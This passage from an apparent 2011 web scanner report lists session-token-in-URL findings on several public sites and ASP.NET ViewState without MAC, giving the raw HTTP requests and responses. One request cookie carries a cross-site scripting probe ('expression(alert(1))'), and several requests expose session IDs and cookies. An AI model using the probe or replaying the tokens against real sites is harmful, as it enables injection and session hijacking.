Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 220
Date: Sat, 03 Sep 2011 21:32:51 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1315085400638-452340.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...

8.7. http://research.microsoft.com/en-us/about/awards.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://research.microsoft.com
Path:   /en-us/about/awards.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en-us/about/awards.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/research/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:06:03 GMT
Content-Length: 149173

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<!-- v:10.0.7.12 -->
   <head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible" con
...[SNIP]...
ing paper on the principles of distributed computing, the significance and impact of which on the theory and/or practice of distributed computing has been evident for at least a decade. Recognized for <A href="http://delivery.acm.org/10.1145/50000/42283/p288-dwork.pdf?key1=42283&amp;key2=7098097811&amp;coll=GUIDE&amp;dl=GUIDE&amp;CFID=25524953&amp;CFTOKEN=27642754" onClick="stc(this, 142)"><I>
...[SNIP]...

8.8. http://research.microsoft.com/en-us/people/ajbrush/default.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://research.microsoft.com
Path:   /en-us/people/ajbrush/default.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en-us/people/ajbrush/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:27:08 GMT
Connection: close
Content-Length: 86504

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<!-- v:10.0.7.12 -->
   <head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible" con
...[SNIP]...
<LI><A href="http://portal.acm.org/citation.cfm?id=1268551&amp;coll=portal&amp;dl=ACM&amp;CFID=26746030&amp;CFTOKEN=26792350" onClick="stc(this, 77)">A Digital Family Calendar in the Home: Lessons from Field Trials of LINC</A>
...[SNIP]...

8.9. http://research.microsoft.com/en-us/um/people/ymwang/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://research.microsoft.com
Path:   /en-us/um/people/ymwang/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en-us/um/people/ymwang/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 01 Aug 2011 17:09:19 GMT
Accept-Ranges: bytes
ETag: "a68445c06d50cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:25:06 GMT
Connection: close
Content-Length: 169997

<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:x="urn:schemas-microsoft-com:office:excel"
xml
...[SNIP]...
</span> and rollback-recovery
and was a main co-author of the most influential <a
href="http://portal.acm.org/citation.cfm?id=568522.568525&amp;coll=portal&amp;dl=ACM&amp;CFID=4668864&amp;CFTOKEN=2689140#FullText" onClick="stc(this, 17)">
<span
style='color:black;mso-themecolor:text1'>
...[SNIP]...
<span style='font-size:
11.0pt;mso-bidi-font-size:12.0pt;font-family:"Arial","sans-serif"'><a
href="http://portal.acm.org/citation.cfm?id=568522.568525&amp;coll=portal&amp;dl=ACM&amp;CFID=4668864&amp;CFTOKEN=2689140#FullText" onClick="stc(this, 125)">
<span
style='color:#EAEAEA;text-decoration:none;text-underline:none'>
...[SNIP]...

8.10. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=308de2e49a5be660d94a6dc5d68f6dab&app_id=308de2e49a5be660d94a6dc5d68f6dab&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfdba7b9bc%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34dcad608%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28e4d4dc%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2e21e8cb4%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2948d778c%26origin%3Dhttp%253A%252F%252Fwww.meetup.com%252Ff357a4a1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34cdf2834&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.51.64
X-Cnection: close
Date: Sat, 03 Sep 2011 13:11:37 GMT
Content-Length: 241

<script type="text/javascript">
parent.postMessage("cb=f2e21e8cb4&origin=http\u00253A\u00252F\u00252Fwww.meetup.com\u00252Ff357a4a1fc&relation=parent&transport=postmessage&frame=f34cdf2834", "http:\/\
...[SNIP]...

8.11. http://www.meetup.com/api/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.meetup.com
Path:   /api/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /api/?method=storeStart&arg_uuid=45bfb8e4-26a5-4d03-bfc0-39f3ea7ec8d0&arg_process=ghrollout&arg_session=1535927&arg_page=ghome&arg_score=0&arg_variant=new&arg_memberId=0&arg_chapterId=1535927 HTTP/1.1
Host: www.meetup.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MEETUP_MEMBER=id=0&status=1&timestamp=1315055493&bs=0&tz=US%2FEastern&zip=&country=us&city=&state=&lat=0.0&lon=0.0&domain=&dc=&s=88f912a4b3d9f96f4f99f1d5b0e82fe99809932d; MEETUP_AFFIL=affil=meetup&ref=microsoftcambridge.com/events/bostonbizsparkmeetupseptember2011/tabid/879; MEETUP_LANGUAGE=language=en&country=US; MEETUP_GA=id%3D0%26segment%3Dalien; __utma=19434532.1405489551.1315055535.1315055535.1315055535.1; __utmb=19434532.4.10.1315055535; __utmc=19434532; __utmz=19434532.1315055535.1.1.utmcsr=microsoftcambridge.com|utmccn=(referral)|utmcmd=referral|utmcct=/Events/BostonBizSparkMeetupSeptember2011/tabid/879/Default.aspx; __utmv=19434532.id%3D0%26segment%3Dalien; trax_ghrollout#1535927=uuid=45bfb8e4-26a5-4d03-bfc0-39f3ea7ec8d0&v=new&p=ghome&s=0&_=cf8b24

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 13:11:40 GMT
Server: Apache-Coyote/1.1
Expires: 0
X-Meetup-server: app9.int.meetup.com
Content-Type: application/json;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 2
Connection: close

""

8.12. http://www.register.com/css/home-optimized.css  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.register.com
Path:   /css/home-optimized.css

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /css/home-optimized.css;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 302 Found
Date: Sat, 03 Sep 2011 21:31:36 GMT
HostName: atleuapp02.galt.register.com
Location: http://www.register.com/css/home-optimized.css
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.register.com/css/home-optimized.css"
...[SNIP]...

8.13. http://www.register.com/js/aop-attach.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.register.com
Path:   /js/aop-attach.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /js/aop-attach.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 302 Found
Date: Sat, 03 Sep 2011 21:31:41 GMT
HostName: atleuapp02.galt.register.com
Location: http://www.register.com/js/aop-attach.js
Content-Length: 224
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.register.com/js/aop-attach.js">here<
...[SNIP]...

8.14. http://www.register.com/js/homepage-optimized.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.register.com
Path:   /js/homepage-optimized.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /js/homepage-optimized.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 302 Found
Date: Sat, 03 Sep 2011 21:31:55 GMT
HostName: atleuapp02.galt.register.com
Location: http://www.register.com/js/homepage-optimized.js
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.register.com/js/homepage-optimized.j
...[SNIP]...

8.15. http://www.register.com/js/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.register.com
Path:   /js/jquery-1.3.2.min.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /js/jquery-1.3.2.min.js;jsessionid=7F95BBDBD32D1299F06089A606E23A3A.janus-production HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_TEMP=DO_NOT_USE; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 302 Found
Date: Sat, 03 Sep 2011 21:31:41 GMT
HostName: atleuapp02.galt.register.com
Location: http://www.register.com/js/jquery-1.3.2.min.js
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.register.com/js/jquery-1.3.2.min.js"
...[SNIP]...

9. ASP.NET ViewState without MAC enabled  previous  next
There are 3 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


9.1. https://www.sslmatrix.com/Order/quickorder  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.sslmatrix.com
Path:   /Order/quickorder

Request

GET /Order/quickorder?pid=1&yr=5&ot=new&cc=smr09 HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Referer: https://www.sslmatrix.com/ssl-promotion-code
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=sbarsdjyp5j2be55zav4bkbo

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:26:02 GMT
Content-Length: 59992


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1">
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTY3NTg0ODQ1Mg9kFgJmD2QWAmYPZBYCAgMPFgIeBmFjdGlvbgUsL09yZGVyL3F1aWNrb3JkZXI/cGlkPTEmeXI9NSZvdD1uZXcmY2M9c21yMDkWAgIBD2QWCgIBD2QWAmYPZBYCZg9kFgICAQ8WAh4EVGV4dAX4DzxwIGNsYXNzPSJsb2dvX3BhZGRpbmciPjxhIGhyZWY9Ii8iPjxpbWcgc3JjPSIvaW1hZ2VzL2xvZ28ucG5nIiBib3JkZXI9IjAiIGFsdD0iQ2hlYXAgU1NMIiAvPjwvYT48L3A+DQo8ZGl2IGNsYXNzPSJ0b3BfdGV4dCI+R2xvYmFsIFN1cHBsaWVyIE9mIFRydXN0ZWQgU1NMIENlcnRpZmljYXRlcyAmYW1wOyBTaXRlIFNlYWwuPC9kaXY+DQo8IS0tIEJFR0lOIExpdmVQZXJzb24gTW9uaXRvci4gLS0+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+Ly8gPCFbQ0RBVEFbDQogICAgICAgIHZhciBscE1UYWdDb25maWcgPSB7ICdscFNlcnZlcic6ICJzZXJ2ZXIuaWFkLmxpdmVwZXJzb24ubmV0IiwgJ2xwTnVtYmVyJzogIjU3OTM3ODAzIiwgJ2xwUHJvdG9jb2wnOiAiaHR0cHMiIH07DQogICAgICAgIGZ1bmN0aW9uIGxwQWRkTW9uaXRvclRhZyhzcmMpIHsNCiAgICAgICAgICAgIGlmICh0eXBlb2YgKHNyYykgPT0gJ3VuZGVmaW5lZCcgfHwgdHlwZW9mIChzcmMpID09ICdvYmplY3QnKSB7DQogICAgICAgICAgICAgICAgc3JjID0gbHBNVGFnQ29uZmlnLmxwTVRhZ1NyYyA/IGxwTVRhZ0NvbmZpZy5scE1UYWdTcmMgOiAnL2hjcC9odG1sL21UYWcuanMnOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgaWYgKHNyYy5pbmRleE9mKCdodHRwJykgIT0gMCkgew0KICAgICAgICAgICAgICAgIHNyYyA9IGxwTVRhZ0NvbmZpZy5scFByb3RvY29sICsgIjovLyIgKyBscE1UYWdDb25maWcubHBTZXJ2ZXIgKyBzcmMgKyAnP3NpdGU9JyArIGxwTVRhZ0NvbmZpZy5scE51bWJlcjsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIGVsc2Ugew0KICAgICAgICAgICAgICAgIGlmIChzcmMuaW5kZXhPZignc2l0ZT0nKSA8IDApIHsNCiAgICAgICAgICAgICAgICAgICAgaWYgKHNyYy5pbmRleE9mKCc/JykgPCAwKSBzcmMgPSBzcmMgKyAnPyc7IGVsc2Ugc3JjID0gc3JjICsgJyYnOyBzcmMgPSBzcmMgKyAnc2l0ZT0nICsgbHBNVGFnQ29uZmlnLmxwTnVtYmVyOw0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgIH07IHZhciBzID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7IHMuc2V0QXR0cmlidXRlKCd0eXBlJywgJ3RleHQvamF2YXNjcmlwdCcpOyBzLnNldEF0dHJpYnV0ZSgnY2hhcnNldCcsICdpc28tODg1OS0xJyk7IHMuc2V0QXR0cmlidXRlKCdzcmMnLCBzcmMpOyBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnaGVhZCcpLml0ZW0oMCkuYXBwZW5kQ2hpbGQocyk7DQogICAgICAgIH0gaWYgKHdpbmRvdy5hdHRhY2hFdmVudCkgd2luZG93LmF0dGFjaEV2ZW50KCdvbmxvYWQnLCBscEFkZE1vbml0b3JUYWcpOyBlbHNlIHdpbmRvdy5hZGRFdmVudExpc3RlbmVyKCJsb2FkIiwgbHBBZGRNb25pdG9yVGFnLCBmYWxzZSk7DQovLyBdXT48L3NjcmlwdD4NCjwhLS0gRU5EIExpdmVQZXJzb24gTW9uaXRvci4gLS0+IDwhLS0gTGl2ZSBDaGF0IENvZGUgRW5kcyBIZXJlICAtLT4gPCEtLSBFTkQgTGl2ZVBlcnNvbiBNb25pdG9yLiAtLT4gPCEtLSBHb29nbGUgQW5hbHl0aWNzIENvZGUgU3RhcnQgLS0+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+Ly8gPCFbQ0RBVEFbDQp2YXIgZ2FKc0hvc3QgPSAoKCJodHRwczoiID09IGRvY3VtZW50LmxvY2F0aW9uLnByb3RvY29sKSA/ICJodHRwczovL3NzbC4iIDogImh0dHA6Ly93d3cuIik7DQpkb2N1bWVudC53cml0ZSh1bmVzY2FwZSgiJTNDc2NyaXB0IHNyYz0nIiArIGdhSnNIb3N0ICsgImdvb2dsZS1hbmFseXRpY3MuY29tL2dhLmpzJyB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnJTNFJTNDL3NjcmlwdCUzRSIpKTsNCi8vIF1dPjwvc2NyaXB0Pg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPi8vIDwhW0NEQVRBWw0KdHJ5IHsNCnZhciBwYWdlVHJhY2tlciA9IF9nYXQuX2dldFRyYWNrZXIoIlVBLTExODU0MTEwLTQiKTsNCnBhZ2VUcmFja2VyLl90cmFja1BhZ2V2aWV3KCk7DQp9IGNhdGNoKGVycikge30NCi8vIF1dPjwvc2NyaXB0Pg0KPCEtLSBHb29nbGUgQW5hbHl0aWNzIENvZGUgRW5kIC0tPmQCBQ9kFgICAQ9kFgJmD2QWAmYPZBYCZg8WAh8BBcYKPGRpdiBjbGFzcz0iYmxvY2sgc3NsLWJ5LWJyYW5kIj4NCjxkaXYgY2xhc3M9ImJsb2NrLXRpdGxlIj48c3Bhbj5TU0wgYnkgQnJhbmQ8L3NwYW4+PC9kaXY+DQo8ZGl2IGNsYXNzPSJibG9jay1jb250ZW50Ij4NCjx1bD4NCjxsaT48YSBocmVmPSIvc3NsLWJyYW5kcy9yYXBpZHNzbCI+DQo8aDE+UmFwaWRTU0w8L2gxPg0KPC9hPjwvbGk+DQo8bGk+PGEgaHJlZj0iL3NzbC1icmFuZHMvZ2VvdHJ1c3Qtc3NsIj4NCjxoMT5HZW9UcnVzdDwvaDE+DQo8L2E+PC9saT4NCjxsaSBjbGFzcz0ibGFzdCI+PGEgaHJlZj0iL3NzbC1icmFuZHMvdGhhd3RlLXNzbCI+DQo8aDE+VGhhd3RlPC9oMT4NCjwvYT48L2xpPg0KPGxpIGNsYXNzPSJ0aXRsZSI+U1NMIGJ5IFByaWNlPC9saT4NCjxsaT48YSBocmVmPSIvc3NsLXByb21vdGlvbi1jb2RlL3NzbC1wcmljZSMwdG81